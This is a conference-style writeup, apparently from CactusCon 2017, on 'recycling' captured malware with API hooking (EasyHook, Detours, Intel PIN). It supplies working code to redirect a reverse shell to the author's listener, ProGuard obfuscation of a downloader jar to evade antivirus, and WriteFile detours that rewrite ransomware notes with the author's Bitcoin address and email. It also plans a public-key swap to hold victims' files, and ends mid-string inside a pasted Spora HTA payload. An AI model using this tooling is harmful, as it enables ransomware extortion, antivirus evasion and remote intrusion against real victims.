Recycling Malicious Code

By

Joe G
AKA
AverageJoe

Alternative Title Images

Recycle Someone else's code. Let them do the work.

Reuse Malware. Breed it new life.

Reduce Workload. Why re-invent the wheel?

What happens to malware when the C&C dies? What about when the threat actor is arrested? Dead?

It becomes useless. It has no purpose.

It CAN be used again!

But How?

  1. A debugger
  2. Hooking
  3. Detours
  4. Binary Instrumentation
  5. The Easy Way / Getting Lucky

We can do it a number of ways...

A Debugger?

The debugger is your friend. It has the power.

Full control over data is useful

Joe does rock, thank you.

Debugger is not portable

It's not like we can put the debugger on the target's machine and run along side to intercept functionality. That would be just plain silly.

Hooking?

The idea behind hooking is simple: intercept program events at run time. On Windows that can mean window messages (a can of worms, look it up), library calls, and function pointers. Inline hooking suites do it by overwriting the first instructions of the target function with a jump to your own code. The overwritten instructions are preserved in a 'trampoline', a small stub that executes them and then jumps back into the rest of the original, so the hook can still call the real function when it wants to. Simple, right?
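As an added example (my code, not from the slides), here is the mechanism stripped to its bones on x86-64 or AArch64 Linux: save the first bytes of a function, overwrite them with an absolute jump to a replacement, call it, then put the bytes back. It replaces the function outright rather than building a trampoline back into the original, which is also how the WinExec hook later on behaves; the hooking suites listed next add the trampoline and the fiddly instruction relocation. The function and symbol names are mine, and the Windows equivalent of mprotect() is VirtualProtect().

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <sys/mman.h>
#include <unistd.h>

namespace hookdemo {

// Target of the hook. The volatile array keeps its code comfortably longer
// than the patch, so the overwrite cannot spill into the next function.
__attribute__((noinline)) int add_original(int a, int b) {
    volatile int pad[4] = {a, b, a ^ b, a | b};
    return pad[0] + pad[1];
}

// Replacement. Same signature as the target: a mismatch corrupts the caller's
// stack, which is also why a WinExec hook must look exactly like WinExec.
int mul_replacement(int a, int b) { return a * b; }

#if defined(__x86_64__)
const size_t kPatchLen = 12;                       // mov rax, imm64 ; jmp rax
static void encode_jump(unsigned char *out, void *to) {
    uint64_t addr = reinterpret_cast<uint64_t>(to);
    out[0] = 0x48; out[1] = 0xB8;                  // mov rax, imm64
    std::memcpy(out + 2, &addr, sizeof(addr));
    out[10] = 0xFF; out[11] = 0xE0;                // jmp rax
}
#elif defined(__aarch64__)
const size_t kPatchLen = 16;                       // ldr x16, [pc, #8] ; br x16 ; .quad addr
static void encode_jump(unsigned char *out, void *to) {
    uint64_t addr = reinterpret_cast<uint64_t>(to);
    const uint32_t ldr = 0x58000050;               // ldr x16, [pc, #8]
    const uint32_t br  = 0xD61F0200;               // br x16
    std::memcpy(out, &ldr, 4);
    std::memcpy(out + 4, &br, 4);
    std::memcpy(out + 8, &addr, sizeof(addr));
}
#else
#error "hook stub only written for x86-64 and AArch64"
#endif

// Change protection on every page the patch touches.
static bool set_prot(void *addr, size_t len, int prot) {
    uintptr_t ps = static_cast<uintptr_t>(sysconf(_SC_PAGESIZE));
    uintptr_t a = reinterpret_cast<uintptr_t>(addr);
    uintptr_t start = a & ~(ps - 1);
    uintptr_t end = (a + len + ps - 1) & ~(ps - 1);
    return mprotect(reinterpret_cast<void *>(start), end - start, prot) == 0;
}

struct Hook {
    void *target;
    unsigned char saved[kPatchLen];                // original prologue bytes, for unhooking
};

// Write the jump over the target's prologue. Returns false (and touches nothing)
// if the text page cannot be made writable, e.g. under a strict W^X policy.
bool install(Hook &h, void *target, void *replacement) {
    h.target = target;
    std::memcpy(h.saved, target, kPatchLen);
    unsigned char jmp[kPatchLen];
    encode_jump(jmp, replacement);
    if (!set_prot(target, kPatchLen, PROT_READ | PROT_WRITE | PROT_EXEC)) return false;
    std::memcpy(target, jmp, kPatchLen);
    __builtin___clear_cache(static_cast<char *>(target), static_cast<char *>(target) + kPatchLen);
    set_prot(target, kPatchLen, PROT_READ | PROT_EXEC);
    return true;
}

// Put the saved bytes back (what a DLL_PROCESS_DETACH handler does on Windows).
bool uninstall(Hook &h) {
    if (!set_prot(h.target, kPatchLen, PROT_READ | PROT_WRITE | PROT_EXEC)) return false;
    std::memcpy(h.target, h.saved, kPatchLen);
    __builtin___clear_cache(static_cast<char *>(h.target), static_cast<char *>(h.target) + kPatchLen);
    set_prot(h.target, kPatchLen, PROT_READ | PROT_EXEC);
    return true;
}

// Call through a volatile pointer so the compiler cannot fold the call or
// redirect it to a constant-propagated clone of add_original.
int call_add(int a, int b) {
    int (*volatile fp)(int, int) = add_original;
    return fp(a, b);
}

// Whole cycle: observe the target before, while, and after it is hooked.
bool run_cycle(int a, int b, int &before, int &during, int &after) {
    before = call_add(a, b);
    Hook h;
    if (!install(h, reinterpret_cast<void *>(&add_original),
                 reinterpret_cast<void *>(&mul_replacement))) return false;
    during = call_add(a, b);
    bool restored = uninstall(h);
    after = call_add(a, b);
    return restored;
}

}  // namespace hookdemo
```

With a = 2 and b = 3 the target answers 5, answers 6 while the jump is in place, and 5 again after the saved bytes are restored. Anything that is executing inside the overwritten prologue on another thread at the moment of the patch will crash, which is why the real suites suspend or fence other threads (DetourUpdateThread in Detours, the thread ACL in EasyHook).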

There are many hooking suites. The most popular ones are:

  • EasyHook
  • SubHook
  • MHook
  • PolyHook
  • Paradise
  • Frida

I chose EasyHook due to the name.

Let's play with Metasploit

We're going to create an 'add-user' executable and change its behavior...

I've tried to make it painless....

#include <windows.h>
#include <iostream>
#include <easyhook.h>

// Hook handler. It must match WinExec's signature exactly
// (UINT WINAPI WinExec(LPCSTR, UINT)): a mismatch leaves the stdcall stack
// cleanup wrong and the caller crashes on return.
UINT WINAPI BorrowWinExec(LPCSTR lpCmdLine, UINT uCmdShow)
{
	std::cout << "Replacing WinExec call for: " << lpCmdLine << "\r\n";
	// EasyHook's thread barrier keeps this nested WinExec from re-entering the hook.
	return WinExec("mspaint", SW_MAXIMIZE); // 3 == SW_MAXIMIZE, max window
}

// Entry point EasyHook calls inside the target once RhInjectLibrary() has
// loaded us. inRemoteInfo->UserData carries whatever the injector passed through.
extern "C" void __declspec(dllexport) __stdcall
NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* inRemoteInfo);

void __stdcall NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* inRemoteInfo)
{
	HOOK_TRACE_INFO hHook = { NULL }; // keep track of our hook
	NTSTATUS result = LhInstallHook(
		GetProcAddress(GetModuleHandle(TEXT("kernel32")), "WinExec"),
		BorrowWinExec, NULL, &hHook);
	if (FAILED(result))
	{
		std::wcout << "LhInstallHook failed: " << RtlGetLastErrorString() << "\r\n";
		return;
	}
	// Thread ID 0 means "this thread". An exclusive ACL hooks every thread EXCEPT
	// the ones listed, so the malware's threads hit BorrowWinExec while the
	// injection thread itself does not.
	ULONG ACLEntries[1] = { 0 };
	LhSetExclusiveACL(ACLEntries, 1, &hHook);
}

Unfortunately EasyHook wants a process ID to attach to when run, and the generated exe has done its work and exited before you can type one. The easiest way to keep it alive long enough is to add a Sleep() call to our exe. Joe Hax inc...

#include <windows.h>
#include <iostream>
#include <easyhook.h>

int main()
{
	DWORD processId;
	std::cout << "Enter a process ID: \r\n";
	std::cin >> processId;
	WCHAR wingmsg[] = L"This is filler data, don't care about sending it!";
	WCHAR dllToInject[] = L"justfuckingworkalready.dll";
	std::wcout << "Attempting to inject: " << dllToInject << " \r\n";
	NTSTATUS nt = RhInjectLibrary(
		processId,               // The process to inject into
		0,                       // ThreadId to wake up upon injection (0 = none)
		EASYHOOK_INJECT_DEFAULT,
		dllToInject,             // 32-bit DLL path
		NULL,                    // 64-bit DLL not provided
		wingmsg,                 // buffer copied to the DLL's entry point (UserData)
		sizeof(wingmsg)          // its size in bytes; passing &pointer with 64 sends the pointer plus stack garbage
	);
	if (FAILED(nt))
		std::wcout << "RhInjectLibrary failed: " << RtlGetLastErrorString() << "\r\n";
	return 0;
}

Did I mention the power of a debugger?

Hooker Video

Detours

With Detours we can rewrite API calls like EasyHook, but more importantly it lets us intercept at particular addresses, not just named exports. EasyHook won't let me :(

More Metasploit. Let's Redirect a reverse shell!

Generate a reverse shell that connects back to host 10.10.10.10 on port 802, output as an exe file.

What needs to be altered to redirect a reverse shell?

So...

  • Redirect the call away from the original connect() function
  • Initialize a new sockaddr_in structure and fill it with our own address and port
  • Call the real connect() with the modified structure

#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <detours.h>
#pragma comment(lib, "ws2_32.lib")

// Pointer to the real connect(); DetourAttach() repoints it at the trampoline.
// Attaching happens in DllMain exactly as in the WriteFile DLL further down.
extern "C" int (WINAPI * Real_connect)(SOCKET, const struct sockaddr*, int) = connect;

// Every connect() in the process lands here first; the destination is swapped
// before the real call, and the address the shell asked for is never used.
int WINAPI Detour_connect(SOCKET s, const struct sockaddr* name, int namelen)
{
	struct sockaddr_in clientService;
	memset(&clientService, 0, sizeof(clientService));        // also zeroes sin_zero
	clientService.sin_family = AF_INET;
	clientService.sin_addr.s_addr = inet_addr("127.0.0.1"); // our listener, not 10.10.10.10
	clientService.sin_port = htons(27015);                   // our port, not 802
	return Real_connect(s, (struct sockaddr*)&clientService, sizeof(clientService)); // detoured now!
}

In our code we set the address to localhost and the port to 27015, fill the struct, and pass it to the real connect(); the shell's original 10.10.10.10:802 destination is simply dropped.
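The detour above swaps the destination of every connect() the process makes, which is fine for a one-socket reverse shell but not for anything chattier. As an added example (my code, not from the talk), here is the same decision made per call with portable BSD-socket structures: only a connection to the dead C2 (10.10.10.10:802, the address baked into the payload above) is redirected to our listener (127.0.0.1:27015), IPv6 destinations are handled alongside IPv4, and the real connect() is passed in as a pointer so the logic can be exercised offline. On Windows the headers become winsock2.h and ws2tcpip.h, and that pointer is Real_connect.

```cpp
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <cstdint>
#include <cstring>
#include <string>

namespace redirect {

struct Rule {
    std::string dead_host;  // the C2 that no longer answers
    uint16_t    dead_port;
    std::string new_host;   // where we want the implant to go instead
    uint16_t    new_port;
};

// Parse an IPv4 or IPv6 text address into a sockaddr_storage. False on bad input.
bool make_addr(const std::string &host, uint16_t port, sockaddr_storage &out, socklen_t &outlen) {
    std::memset(&out, 0, sizeof(out));
    auto *v4 = reinterpret_cast<sockaddr_in *>(&out);
    if (inet_pton(AF_INET, host.c_str(), &v4->sin_addr) == 1) {
        v4->sin_family = AF_INET;
        v4->sin_port = htons(port);
        outlen = sizeof(sockaddr_in);
        return true;
    }
    auto *v6 = reinterpret_cast<sockaddr_in6 *>(&out);
    if (inet_pton(AF_INET6, host.c_str(), &v6->sin6_addr) == 1) {
        v6->sin6_family = AF_INET6;
        v6->sin6_port = htons(port);
        outlen = sizeof(sockaddr_in6);
        return true;
    }
    return false;
}

// Render a destination as "host:port" for matching and logging. A namelen that
// is too short for the family is treated as unsupported rather than read past.
std::string describe(const sockaddr *sa, socklen_t len) {
    char buf[INET6_ADDRSTRLEN] = {0};
    if (sa->sa_family == AF_INET && len >= static_cast<socklen_t>(sizeof(sockaddr_in))) {
        auto *v4 = reinterpret_cast<const sockaddr_in *>(sa);
        inet_ntop(AF_INET, &v4->sin_addr, buf, sizeof(buf));
        return std::string(buf) + ":" + std::to_string(ntohs(v4->sin_port));
    }
    if (sa->sa_family == AF_INET6 && len >= static_cast<socklen_t>(sizeof(sockaddr_in6))) {
        auto *v6 = reinterpret_cast<const sockaddr_in6 *>(sa);
        inet_ntop(AF_INET6, &v6->sin6_addr, buf, sizeof(buf));
        return "[" + std::string(buf) + "]:" + std::to_string(ntohs(v6->sin6_port));
    }
    return "<unsupported>";
}

// Is this connect() headed for the dead C2? If so, fill `out` with the replacement.
bool rewrite(const sockaddr *name, socklen_t namelen, const Rule &rule,
             sockaddr_storage &out, socklen_t &outlen) {
    sockaddr_storage dead;
    socklen_t deadlen = 0;
    if (!make_addr(rule.dead_host, rule.dead_port, dead, deadlen)) return false;
    if (describe(name, namelen) != describe(reinterpret_cast<const sockaddr *>(&dead), deadlen))
        return false;
    return make_addr(rule.new_host, rule.new_port, out, outlen);
}

// The detour body. The real connect() is injected so no socket is needed here.
typedef int (*connect_fn)(int, const sockaddr *, socklen_t);

int detoured_connect(int s, const sockaddr *name, socklen_t namelen,
                     const Rule &rule, connect_fn real_connect) {
    sockaddr_storage replacement;
    socklen_t replen = 0;
    if (rewrite(name, namelen, rule, replacement, replen)) {
        // Pass the replacement's own length: an IPv4 C2 may be swapped for an IPv6 listener.
        return real_connect(s, reinterpret_cast<const sockaddr *>(&replacement), replen);
    }
    return real_connect(s, name, namelen);   // everything else goes where it wanted to
}

// Offline stand-in for the real connect(): records the destination it was given.
std::string last_destination;
int record_connect(int, const sockaddr *name, socklen_t namelen) {
    last_destination = describe(name, namelen);
    return 0;
}

}  // namespace redirect
```

The match is done on the rendered "host:port" string, so an IPv4-mapped IPv6 destination ("::ffff:10.10.10.10") is deliberately not treated as the same C2; add a second Rule for it if the implant can be built to use dual-stack sockets.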

Let's watch it work

Binary Instrumentation

Intel's PIN

A utility produced by Intel that's cross platform and lets you instrument programs dynamically: add functionality, debug, trace, or just plain mess with them.

DynamoRIO

The same concept as Intel's PIN.

Just free and open source. And with shittier documentation and samples. Also cross platform.

 

For simplicity's sake I will be making use of PIN.

Let's play with file deletion.

I have a simple evil program. I want to instrument the program and have it not delete spacey.

#include <windows.h>
#include <stdio.h>

int main(void)
{
	// omitted cactus for brevity
	WIN32_FIND_DATAA fd;
	// ANSI variants spelled out: the PIN tool below has to know it is
	// DeleteFileA, not DeleteFileW, that it needs to catch.
	HANDLE hFind = FindFirstFileA("kevin-spacey*", &fd);
	if (hFind != INVALID_HANDLE_VALUE)
	{
		do
		{
			printf("Deleting file %s \r\n", fd.cFileName);
			DeleteFileA(fd.cFileName);
		} while (FindNextFileA(hFind, &fd));
		FindClose(hFind);
	}
	printf("And gone!\r\n");
	getchar();
	return 9;
}

Teh Codez To Do So

#include "pin.H"
#include <iostream>
#include <cstring>
namespace WINDOWS
{
#include <Windows.h>
}
using namespace std;

// Signature of the real DeleteFileA, handed to the replacement as IARG_ORIG_FUNCPTR.
typedef WINDOWS::BOOL (* ORIG_FILE_DEL)(const char *);

// Runs instead of DeleteFileA. PIN passes the original function pointer first,
// then the original arguments (here: the file name).
BOOL DontDeleteEverything(ORIG_FILE_DEL orig_pte, char *dafile)
{
	cout << "I see a file to be deleted: " << dafile << endl;
	WINDOWS::Sleep(1000);

	if (strstr(dafile, "kevin-spacey") != NULL)
	{
		cout << "NOOOOOOO, LEAVE SPACEY ALONE! " << endl;
		// Hand the real DeleteFileA a name that does not exist, then report
		// success so the malware believes the file is gone.
		orig_pte("nowayjose");
		return TRUE;
	}
	cout << "Whatever man... " << endl;
	return orig_pte(dafile); // anything else is deleted as the malware intended
}

// Called for every image (exe or DLL) loaded into the process. The sample is an
// ANSI build, so the import to replace is DeleteFileA; a Unicode build would
// need DeleteFileW and a wide-string check instead.
VOID ImageLoad(IMG img, VOID *v)
{
	RTN rtn = RTN_FindByName(img, "DeleteFileA");
	if (RTN_Valid(rtn))
	{
		cout << "Replacing DeleteFile in " << IMG_Name(img) << endl;
		PROTO proto_delfile = PROTO_Allocate(PIN_PARG(BOOL), CALLINGSTD_DEFAULT,
			"DeleteFileA", PIN_PARG(char *), PIN_PARG_END());
		// Probe mode: PIN overwrites the function entry with a jump, no JIT involved.
		RTN_ReplaceSignatureProbed(rtn, AFUNPTR(DontDeleteEverything),
			IARG_PROTOTYPE, proto_delfile,
			IARG_ORIG_FUNCPTR,
			IARG_FUNCARG_ENTRYPOINT_VALUE, 0,
			IARG_END);
		PROTO_Free(proto_delfile);
	}
}

INT32 Usage()
{
	cerr << "This tool ensures that file deletion never deletes everything." << endl;
	cerr << endl << KNOB_BASE::StringKnobSummary() << endl;
	return -1;
}

int main(INT32 argc, CHAR *argv[])
{
	PIN_InitSymbols();
	if (PIN_Init(argc, argv)) return Usage();
	IMG_AddInstrumentFunction(ImageLoad, 0);
	PIN_StartProgramProbed(); // never returns
	return 0;
}

Does it work? You bet your ass it does!

What's not to like about PIN? It makes everything HUGE. 4 MB for a DLL file plus another 16 MB for the launcher.  EasyHook only clocks in at 427kb (launcher + dll). Detours is tiny at a 136kb all included.  Size matters.

Getting Lucky

Sometimes I get lucky

Sometimes people code their malware in Java, .NET, or Python.

Sometimes they don't even PACK or ENCRYPT the thing.

Take this jar file for example.

The file is a downloader and, it seems, not well liked.

Mobile code makes it easy

File downloads from http://191.252.2.93 and opens a zip file and then executes the stuff within.

Editing a jar file isn't hard.

There exist many free editors for the jar file of varying degrees of usefulness.

Since a jar file is basically just a zip archive with '.class' files inside, it's trivial to remove classes.

The best one is DirtyJoe.

Hits close to home.

Honorable Mention is Class Editor.

I am able to easily edit what I want with DirtyJoe

DirtyJoe even has a raw bytecode editor for if you're HARDCORE

Class Editor is meh.

After changing the URI, many AVs were baffled.

We can further confuse the AV's by adding obfuscation. Many free obfuscators exist for java.

I used ProGuard and got the detection lower.

More Hax to be done include modifying the manifest file, the names of classes, variable names, and more.

It is much easier to do this via Eclipse and compiling to a jar file.

Much Better

AND NOW...

Let's Recycle A Crypto Locker!

Grabbed this one off of VT: Spora ransomware.

The other one was grabbed from a friend at a bank. Nameless.

Step 1 is to run it and see what happens. This one was run on XP. Text file.

Same one run on Win7. MessageBox and text file.

Here's the Spora one on XP. It writes an HTA file (HTML application), which also carries JavaScript code.

Contents of Spora HTA file

Of particular note is the bottom: JavaScript calling home over Tor with the key.

Text is Russian. Thank you Google.

Your computer has been blocked using the Spora virus. There was a connection problem! To recover, write to the mail: [email protected] Or, try to connect again after 1 hour by restarting the computer

 

Both programs make use of wincrypt functions and both programs write to disk the final message displaying demands / BTC.

To recycle this malware we need only hook the WriteFile API, inspect the data being written, and replace it with our own. Our BTC address and email go inside.
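The Detours DLL further down matches on the note's file name, which means knowing it in advance for every sample. As an added example (my code, not from the talk) that follows the "search the contents" idea literally, here is the detour body done on the buffer itself: it tokenizes what is about to be written, swaps every Bitcoin-address-looking and email-looking token for ours, and leaves the rest of the note (threats, ASCII art, instructions) as the author wrote it. The address and mailbox are constructed placeholders, and the real WriteFile is passed in as a function pointer so this runs without Win32; in the DLL that pointer is Real_Write_File and the arguments are lpBuffer and numbytes2write.

```cpp
#include <cctype>
#include <cstddef>
#include <cstring>
#include <string>

namespace notehook {

// Constructed placeholders: swap in the address and mailbox you actually control.
const std::string kOurAddress = "1ReuseAddressPutYoursHere23456789AB";
const std::string kOurEmail   = "recycler@example.invalid";

// Base58 as used by Bitcoin addresses: no 0, O, I or l.
inline bool is_base58(char c) {
    static const std::string alphabet =
        "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz";
    return alphabet.find(c) != std::string::npos;
}

// Characters that end a token; NUL counts, so binary padding is harmless.
inline bool is_delim(char c) {
    return std::isspace(static_cast<unsigned char>(c)) ||
           std::strchr("<>\"'()[]{},;:", c) != nullptr;
}

enum TokenKind { OTHER, BTC_ADDRESS, EMAIL };

// Heuristic classification: a P2PKH/P2SH-looking address is a 26..35 char
// base58 run starting with 1 or 3; a mailbox has an '@' with a dot after it.
TokenKind classify(const std::string &tok) {
    if (tok.size() >= 26 && tok.size() <= 35 && (tok[0] == '1' || tok[0] == '3')) {
        bool ok = true;
        for (char c : tok) if (!is_base58(c)) { ok = false; break; }
        if (ok) return BTC_ADDRESS;
    }
    size_t at = tok.find('@');
    if (at != std::string::npos && at > 0 &&
        tok.find('.', at) != std::string::npos && tok.back() != '.')
        return EMAIL;
    return OTHER;
}

// Walk the buffer token by token, swapping the payment details for ours and
// leaving everything else untouched. `swapped` reports how many were replaced.
std::string rewrite_note(const std::string &in, int &swapped) {
    std::string out;
    swapped = 0;
    size_t i = 0;
    while (i < in.size()) {
        if (is_delim(in[i])) { out += in[i++]; continue; }
        size_t j = i;
        while (j < in.size() && !is_delim(in[j])) ++j;
        std::string tok = in.substr(i, j - i);
        switch (classify(tok)) {
            case BTC_ADDRESS: out += kOurAddress; ++swapped; break;
            case EMAIL:       out += kOurEmail;   ++swapped; break;
            default:          out += tok;         break;
        }
        i = j;
    }
    return out;
}

// Shape of the detour body. The "real" writer is passed in: on Windows it is
// Real_Write_File, here it is a capture stub.
typedef bool (*write_fn)(const void *buf, size_t len, size_t *written);

bool hooked_write(const void *buf, size_t len, size_t *written, write_fn real_write) {
    std::string data(static_cast<const char *>(buf), len);
    int swapped = 0;
    std::string patched = rewrite_note(data, swapped);
    if (swapped == 0) return real_write(buf, len, written);   // not a note: pass through untouched
    size_t n = 0;
    bool ok = real_write(patched.data(), patched.size(), &n);
    // Callers compare bytes written against what they asked for; our note is a
    // different length, so report the caller's own count or it may retry or abort.
    if (ok && written) *written = len;
    return ok;
}

// Offline stand-in for WriteFile: records what would have reached the disk.
std::string last_written;
bool capture_write(const void *buf, size_t len, size_t *written) {
    last_written.assign(static_cast<const char *>(buf), len);
    if (written) *written = len;
    return true;
}

}  // namespace notehook
```

The token heuristics are deliberately loose: a note that hides the address in an image, or a sample that writes the note in several WriteFile calls with the address split across a boundary, slips through, so keep the file-name match from the DLL below as a second trigger.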

What about the crypto Joe? What about it? I'm lazy.

"A real black hat wouldn't even bother decrypting files..." - Nak

If you really wanna know, here's how I would do it...

  1. Find the CryptImportPublicKeyInfo() function and hook it
  2. Define my own CERT_PUBLIC_KEY_INFO structure carrying my own public key
  3. Call the original CryptImportPublicKeyInfo() with my custom structure instead of the one the malware passed in
  4. Run everything else like normal

Everything the malware then encrypts under that key can only be unlocked with MY private key.

Only Spora used public key encryption. The other one, however... does NOTHING. Spook!

The 'crypto' is just MD5 hashing with no data passed.

I'm using Detours to replace data in WriteFile...

#include "stdafx.h"
#include <windows.h>
#include <detours.h>
#include <cstring>
#include <string>
#include <Shlwapi.h>
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "detours.lib")


// Pointer to the real WriteFile; DetourAttach() repoints it at the trampoline.
extern "C" BOOL (WINAPI * Real_Write_File)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED) = WriteFile;

BOOL WINAPI Detour_WriteFile(HANDLE passedhandle, LPCVOID lpBuffer,
	DWORD numbytes2write, LPDWORD numbyteswritten, LPOVERLAPPED lpOverlapped)
{
	// Resolve the handle back to a path so we can match on the file name.
	// Pipes, sockets and console handles have no path: the lookup fails (or
	// would need a bigger buffer) and we pass the write through untouched.
	WCHAR buf[MAX_PATH + 1];
	DWORD sz = GetFinalPathNameByHandleW(passedhandle, buf, MAX_PATH, 0);
	if (sz == 0 || sz > MAX_PATH)
	{
		return Real_Write_File(passedhandle, lpBuffer, numbytes2write, numbyteswritten, lpOverlapped);
	}
	buf[sz] = 0;
	WCHAR *pathfilename = PathFindFileNameW(buf);

	// The nameless sample drops a plain text note with a fixed name.
	if (_wcsicmp(pathfilename, L"HOW TO DECRYPT FILES.txt") == 0)
	{
		const char *screw =
		"Attention! All your files are belong \r\n"
		"to us! If you want these files back,\r\n"
		"send 1 BTC to the address:\r\n"
		"1LmQSUfu3KPCLhj26Y4RJVci3FNum51YSR\r\n"
		"then send an email to\r\n"
		"[email protected] with the subject:\r\n"
		"CactusCon 2017\r\n"
		"Then I'll send the decryption key.\r\n"
		"              \r\n"
		"      /|\\\r\n"
		"     |||||\r\n"
		"     |||||\r\n"
		" /\\  |||||\r\n"
		"|||| |||||\r\n"
		"|||| |||||  /\\\r\n"
		"|||| ||||| ||||\r\n"
		" \\|`-'|||| ||||\r\n"
		"  \\__ |||| ||||\r\n"
		"     ||||`-'|||\r\n"
		"     |||| ___/\r\n"
		"     |||||\r\n"
		"     |||||\r\n"
		"-----------------\r\n";

		// Our note goes to disk instead of theirs; lpBuffer is never written.
		return Real_Write_File(passedhandle, screw, (DWORD)strlen(screw), numbyteswritten, lpOverlapped);
	}

	// Spora drops its note as an HTML application, so match on the extension.
	WCHAR *exten = PathFindExtensionW(buf);
	if (_wcsicmp(exten, L".hta") == 0)
	{

		char *me = "<hta:application showInTaskbar=\"no\" innerBorder=\"no\" navigable=\"no\" scroll=\"no\" border=\"none\" caption=\"none\"><html><body><script language='JScript'>t = new ActiveXObject('WScript.Shell').ExpandEnvironmentStrings('%temp%');f = new ActiveXObject('Scripting.FileSystemObject');c = new ActiveXObject('ADODB.Stream');if(!f.FileExists(t+'\\icon_2.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAMAAADXqc3KAAABp1BMVEVMaXHyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgD////yqwDyqQDxpQDxpgDyqADxpADwngDxogD//fn//vzyrAH3zGf63Zr64qf868L87MX87sr++e7++u///v3///7xoQDypwDyqwHyqwLyrADyrALyrAPyrQXyrQrzrgXzrgbzrwbzrwfzrwjzsRDzsBjzshP0tBn0tCH0tR70tiH0uCT0tyz0uCf0uCj1vDT1vjj1vT71vzz1v0n1wUL1wUb2wkX2w0r2x1X3yFj3yVz3y2f3zGX3zGb3zmv40G/40HT40XP40Xb40Xf40Xj40nj51YL514j52Iv52Y3525L63Zn635/636D64qb746r75rX757b87MT87Mb87cj8787978/979D979L98NP98df99eH++Ov++vL++/P+/PT//PX//Pb//Pf//vslsX0oAAAAKHRSTlMAAQMjJCUmKitcXV5fdXZ8fYGCnp+io6TDxMbH7O7v8PHy9fb7/P3+2lfZUwAAAZhJREFUKM9FktV2G0EQRFurxFYMUZzYSUwyaWduz4IoZgozMzMzMzN9dB52FPdj1zndp+qWiIgEOSms7i9ZM9jXVZBcIH4Cya8dwwJYxtYtk6C5bxvGGmNx1hjLSEemBNKJCS2QVqIIGxpWSiASSDuhgYj06P2dGxyYkA4JRFqGMMCmrdV7P/e9vx47DEMtItJNGVz8YO7xl6mTejreAmW6RVpHsODSc9M6v6CNm5tTh2WkVYoYAFc71tCJyR/68WDqMKyS9V6Ix3V2f+3UrD6NHYZeGcicufiZvkkrO77qy8RhGZAy2bhPWv88+UH/XEwcEHrBJUd+68Tz76oPKw6g7E9F2y7pr0O1XS+0fsaf6sVAtPf1W51JNlbPqt6qZM+LGFx8TRv67dGVy+9ULyQOQ9Eb3HP87t+5BdV5fQWZQVlDGVg8ryemZ+48Gd8e+UhkeQmDS25MHahfrSZxhA8xkDaMAdzu24cjH3t7BsSDiioRYENDZxOhR+sywMMrlqDne0abZRjtyctSTXJS6OobNKbU/78+/wBwgVrMmlG5mwAAAABJRU5ErkJggg==';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_2.png', 2),c.close();}if(!f.FileExists(t+'\\icon_3.png')){b = new 
ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAMAAABg3Am1AAAChVBMVEVMaXFJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4ZJX4VJX4VJX4VJX4VJX4VJX4VJX4VJXoVJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJYIVJX4ZJX4VJX4VKX4VJX4VJX4VJX4VJX4VJX4VHYIVJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJXoVJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VKYIVHX4VJX4VJXoVJX4VJX4UVqfBJX4VHXoRLYYhBWH0XICwVe64Vpu0Vs/9MYodAWIEVqO8UqvJgcpHy9fYcrvQDK0psb3ZKYIUVtP9JX4RJXoRLYYlFXYNAV3wUIS5BWn0VsPwVeawVp+4+Vn8arPNKX4VKYIZKYIcVqvEXHysVXYEVgrQVo+kXHywVgrIWvv9MYoZAV4BfcpNKYYhGXYM/V4Dy9fVgcpLy9vcarfNidZVscXcHMk9cX2bg4eFkd5dgc5Jkd5aJlq7e39/o6ur19fIHM09TVl1UWF4FME1AWH1PZIo9VIAVqe8UqfIVeq4VHyvx8vGGkqVFXYAVpewVs/4cJTEwSW8Ue67y9PVrd4AcuP0DFCcDLEobq/ECIz0bgK5rc3kDLk1sb3cUp+9sbnUDK0kcrvVAV4FFXIMlOVIkOVK1vchEXIO1vMhvqanaAAAAbXRSTlMABPoCA/sB/fz+7LhgJAX555gJNg7B8/ICxJpy7pcBmSvjIsDLaSr4VGNYa2+/DOsD6eoL8Cff4XYm294KLOW+cCpXf/EDDvR9Ae0PZlZ6A2VVWS80MXgjdQMlIcJiLrkjdO/klJORAQRxCbZefx9iKwAAA3BJREFUSMeVlmV721AMhY9jx9dOU4YV165jZoaOmZmZQSluawdJGcfMzMzMzLzfs8eQzkmctHk/+To6jyTrRhJggOcaIirNnpjQPS48PK57QqI9LQoNOR7m8PEievYIsZEBW0iPnhDjTSUCj5kpEUQkSUxWjGUmSUQUERkKXvC15xAzqAHJViszemBWq0yDhw8F52UuCohuQkzysNY1EqMm0RBED/swtLKRJJMpskS2gQgTPeJpaiEL+cUiW5oao+LRWmaMAsCY3Bq1mQuYKMkyBUSWpVZuBYfokSRRHUjUaYoWlYhRCWSlOrFQbAyUxDtgrJ5vocMPhbpiuhIUj67JpCXgLM40pXirlgZ1mg8eHFL1gLYVlZZnmVBeWrRNT2MplgNdF5HyRQudRb/KdmSbsKPsZ9FWJSpGjUIBLNAcOIpLy3buqszxoXLXzr